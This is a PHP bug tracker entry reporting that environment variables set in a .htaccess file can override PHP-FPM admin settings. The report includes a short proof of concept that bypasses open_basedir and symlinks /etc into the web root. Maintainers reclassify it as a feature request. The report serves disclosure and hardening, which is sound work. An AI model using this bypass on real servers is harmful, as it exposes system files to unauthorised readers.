PHP :: Request #72129 :: PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess

Request #72129	PHP_VALUE, PHP_ADMIN_VALUE... changed by environment variables set in .htaccess
Submitted:	2016-04-29 15:46 UTC	Modified:	2021-12-04 18:23 UTC
From:	ouroboros_17 at hotmail dot com	Assigned:	bukka (profile)
Status:	Assigned	Package:	FPM related
PHP Version:	5.6.21	OS:	Debian (all Linux distributions)
Private report:	No	CVE-ID:	None

View Developer Edit

Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If you forgot your password, you can retrieve your password here.

Password:

Status:
Package:
Bug Type:
Summary:
From:	ouroboros_17 at hotmail dot com
New email:
PHP Version:		OS:

New Comment:

[2016-04-29 15:46 UTC] ouroboros_17 at hotmail dot com

Description:
------------
It is possible, for a malicious user, to change PHP configuration with a .htaccess file on Apache with PHP-FPM. It is not something trivial, but if he can upload a .htaccess in the www folder, he can break open_basedir restrictions (see example below).

This behaviour can be fixed:
- AllowOverride None in Apache configuration (a good practice but it is not really usual in the real world)
- prevent upload of .htaccess (application side, not related with PHP-FPM)
- disable mod_env

PHP as a module of Apache cannot be affected because only php_value can be set in .htaccess.

It should be documented at least, or it should be possible to disable the hability to set configuration via environment variables.

See bug #3991 too.

Test script:
---------------
Apache vhost
------------------
DocumentRoot /var/www
<Directory /var/www/>
  AllowOverride All

  <FilesMatch \.php$>
    SetHandler "proxy:unix:/var/run/php5-fpm.sock|fcgi://localhost/"
  </FilesMatch>
</Directory>


/var/www/.htaccess
------------------
Options +FollowSymLinks -SymLinksIfOwnerMatch
SetEnv PHP_ADMIN_VALUE "open_basedir=/"


/var/www/index.php
------------------
<?php symlink('/etc', 'foo');


PHP-FPM pool
------------------
[...]
php_admin_value[open_basedir] = /var/www


Access "index.php" with HTTP so it creates the symlink, see files in /etc via the http://example.com/foo URI.

Patches

Pull Requests

History

AllCommentsChangesGit/SVN commitsRelated reports

[2016-04-29 22:53 UTC] stas@php.net

-Assigned To: +Assigned To: fat

[2017-10-24 07:45 UTC] kalle@php.net

-Status: Assigned +Status: Open -Assigned To: fat +Assigned To:

[2021-07-12 16:05 UTC] cmb@php.net

-Type: Security +Type: Bug

[2021-07-12 16:05 UTC] cmb@php.net

> but if he can upload a .htaccess in the www folder, he can break
> open_basedir restrictions

open_basedir bypasses are not considered to be security issues;
cf. <https://externals.io/message/105606>
and <https://externals.io/message/115406>.

Besides that the possibility to upload a .htaccess to the web root
would be a serious issue of the application.

> /var/www/index.php
> ------------------
> <?php symlink('/etc', 'foo');

This code looks obviously malicious, so is not a security issue
according to <https://wiki.php.net/security#not_a_security_issue>.

[2021-12-04 18:23 UTC] bukka@php.net

-Type: Bug +Type: Feature/Change Request

[2021-12-04 18:23 UTC] bukka@php.net

This behaviour is on purpose and its mitigation (optional disabling) is treated as a feature.

[2021-12-04 18:23 UTC] bukka@php.net

-Assigned To: +Assigned To: bukka

	php.net \| support \| documentation \| report a bug \| advanced search \| search howto \| statistics \| random bug \| login
go to bug id or search bugs for


Copyright © 2001-2024 The PHP Group All rights reserved.	Last updated: Thu Nov 21 15:01:30 2024 UTC